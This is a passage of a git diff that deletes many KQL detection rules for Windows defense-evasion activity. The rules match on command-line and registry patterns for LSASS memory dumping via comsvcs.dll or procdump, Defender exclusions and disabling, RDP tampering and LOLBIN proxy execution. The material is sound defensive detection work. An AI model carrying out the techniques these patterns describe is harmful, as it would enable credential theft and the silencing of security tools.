"ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/Defense Evasion/Powershell_Defender_Exclusion.kql b/Defense Evasion/Powershell_Defender_Exclusion.kql deleted file mode 100644 index 72f711b3..00000000 --- a/Defense Evasion/Powershell_Defender_Exclusion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/04/29 -// Level: medium -// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ") \ No newline at end of file diff --git a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql b/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql deleted file mode 100644 index 2e4c9b07..00000000 --- a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/27 -// Level: high -// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation -// Tags: attack.defense_evasion, attack.t1027.009 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}" \ No newline at end of file diff --git a/Defense Evasion/Powerup_Write_Hijack_DLL.kql b/Defense Evasion/Powerup_Write_Hijack_DLL.kql deleted file mode 100644 index b2cd19b0..00000000 --- a/Defense Evasion/Powerup_Write_Hijack_DLL.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Subhash Popuri (@pbssubhash) -// Date: 2021/08/21 -// Level: high -// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. -In it's default mode, it builds a self deleting .bat file which executes malicious command. -The detection rule relies on creation of the malicious bat file (debug.bat by default). - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat" \ No newline at end of file diff --git a/Defense Evasion/Prefetch_File_Deleted.kql b/Defense Evasion/Prefetch_File_Deleted.kql deleted file mode 100644 index c59b8323..00000000 --- a/Defense Evasion/Prefetch_File_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Cedric MAURUGEON -// Date: 2021/09/29 -// Level: high -// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceFileEvents -| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))) \ No newline at end of file diff --git a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql b/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql deleted file mode 100644 index 833c963a..00000000 --- a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/02 -// Level: high -// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. -// Tags: attack.command_and_control, attack.t1105, attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe" \ No newline at end of file diff --git a/Defense Evasion/Procdump_Execution.kql b/Defense Evasion/Procdump_Execution.kql deleted file mode 100644 index e0baffc1..00000000 --- a/Defense Evasion/Procdump_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/16 -// Level: medium -// Description: Detects usage of the SysInternals Procdump utility -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" \ No newline at end of file diff --git a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql b/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql deleted file mode 100644 index 3f8a20a2..00000000 --- a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/10 -// Level: high -// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory -// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall")))) \ No newline at end of file diff --git a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql b/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql deleted file mode 100644 index f767153d..00000000 --- a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/08/23 -// Level: medium -// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055 -DeviceProcessEvents -| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\" \ No newline at end of file diff --git a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql deleted file mode 100644 index 2530eb6f..00000000 --- a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/02/18 -// Level: high -// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) -// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009 -DeviceProcessEvents -| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full")) \ No newline at end of file diff --git a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql b/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql deleted file mode 100644 index fddf31d9..00000000 --- a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll") \ No newline at end of file diff --git a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql deleted file mode 100644 index 864ecfca..00000000 --- a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql b/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql deleted file mode 100644 index fa762cf8..00000000 --- a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative -// Date: 2020/10/05 -// Level: low -// Description: Attackers can use explorer.exe for evading defense mechanisms -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql b/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql deleted file mode 100644 index ef5df7d2..00000000 --- a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team -// Date: 2020/10/12 -// Level: high -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file diff --git a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql deleted file mode 100644 index bf82b08d..00000000 --- a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: medium -// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents -// Tags: attack.defense_evasion -DeviceFileEvents -| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub" \ No newline at end of file diff --git a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql b/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql deleted file mode 100644 index 2654053b..00000000 --- a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/28 -// Level: medium -// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. -// Tags: attack.defense_evasion, attack.t1216.001 -DeviceProcessEvents -| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:" \ No newline at end of file diff --git a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql b/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql deleted file mode 100644 index 68a7e400..00000000 --- a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Patrick St. John, OTR (Open Threat Research) -// Date: 2020/05/03 -// Level: medium -// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. -// Tags: attack.defense_evasion, attack.t1027.002 -DeviceImageLoadEvents -| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file diff --git a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql deleted file mode 100644 index 642d1a2c..00000000 --- a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sander Wiebing -// Date: 2020/05/23 -// Level: high -// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceProcessEvents -| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql b/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql deleted file mode 100644 index 42662a16..00000000 --- a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/18 -// Level: high -// Description: Detects Rclone config file being created -// Tags: attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath contains ".rdp" \ No newline at end of file diff --git a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql deleted file mode 100644 index 85c02aac..00000000 --- a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2019/01/29 -// Level: high -// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceProcessEvents -| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed.kql deleted file mode 100644 index 7dbac35c..00000000 --- a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022/08/06 -// Level: high -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc - -// Tags: attack.defense_evasion, attack.persistence, attack.t1112 -DeviceRegistryEvents -| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram") \ No newline at end of file diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql deleted file mode 100644 index a60a95e8..00000000 --- a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022/09/29 -// Level: medium -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. - -// Tags: attack.defense_evasion, attack.persistence, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication") \ No newline at end of file diff --git a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql b/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql deleted file mode 100644 index faa83823..00000000 --- a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register" \ No newline at end of file diff --git a/Defense Evasion/Raccine_Uninstall.kql b/Defense Evasion/Raccine_Uninstall.kql deleted file mode 100644 index 49b64825..00000000 --- a/Defense Evasion/Raccine_Uninstall.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/01/21 -// Level: high -// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater") \ No newline at end of file diff --git a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql b/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql deleted file mode 100644 index dd92ad7b..00000000 --- a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alexander Rausch -// Date: 2020/06/24 -// Level: high -// Description: Detects actions caused by the RedMimicry Winnti playbook -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data" \ No newline at end of file diff --git a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql b/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql deleted file mode 100644 index 0e6d6555..00000000 --- a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2024/04/25 -// Level: medium -// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses -// Tags: attack.defense_evasion, attack.t1218.009 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Defense Evasion/Reg_Add_Suspicious_Paths.kql b/Defense Evasion/Reg_Add_Suspicious_Paths.kql deleted file mode 100644 index 60b1ec1c..00000000 --- a/Defense Evasion/Reg_Add_Suspicious_Paths.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: high -// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys -// Tags: attack.defense_evasion, attack.t1112, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Defense Evasion/Registry_Explorer_Policy_Modification.kql b/Defense Evasion/Registry_Explorer_Policy_Modification.kql deleted file mode 100644 index 99eafa71..00000000 --- a/Defense Evasion/Registry_Explorer_Policy_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/03/18 -// Level: medium -// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu") \ No newline at end of file diff --git a/Defense Evasion/Registry_Hide_Function_from_User.kql b/Defense Evasion/Registry_Hide_Function_from_User.kql deleted file mode 100644 index 3bb44e14..00000000 --- a/Defense Evasion/Registry_Hide_Function_from_User.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/03/18 -// Level: medium -// Description: Detects registry modifications that hide internal 